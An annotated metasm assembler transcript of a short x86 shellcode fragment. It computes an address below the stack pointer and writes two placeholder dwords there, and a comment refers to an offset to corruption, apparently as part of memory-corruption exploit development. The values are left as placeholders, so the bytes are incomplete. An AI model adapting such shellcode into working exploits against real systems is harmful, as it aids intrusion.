# metasm shell transcript: each "metasm >" line is one x86 (32-bit) instruction
# typed at the prompt; the quoted string on the following line is the machine-code
# encoding shown for it.
# Net effect of the sequence as listed: ECX = ESP - 170h, one dword is stored at
# [ECX], ECX is advanced by 4, and a second dword is stored at the new [ECX].
# The stored values appear only as "????????h" / "\x??" placeholders on this page,
# so the listing is not a complete byte string as shown.
metasm > push esp  # push the current stack pointer ...
"\x54"
metasm > pop ecx  # ... and pop it straight back: ECX now holds the ESP value
"\x59"
metasm > add ecx,-170h  # ECX = ESP - 170h. Author's note: ESP – start of buffer – offset to corruption (1C1h)
"\x81\xc1\x90\xfe\xff\xff"
metasm > mov dword ptr [ecx], ????????h  # first 4-byte store at [ECX]; immediate is a placeholder in the source
"\xc7\x01\x??\x??\x??\x??"
metasm > inc ecx  # four single-byte increments in a row: ECX += 4 in total,
"\x41"
metasm > inc ecx  # i.e. ECX moves to the dword immediately after the one just written
"\x41"
metasm > inc ecx
"\x41"
metasm > inc ecx
"\x41"
metasm > mov dword ptr [ecx], ????????h  # second 4-byte store, at the adjacent dword; immediate again a placeholder
"\xc7\x01\x??\x??\x??\x??"
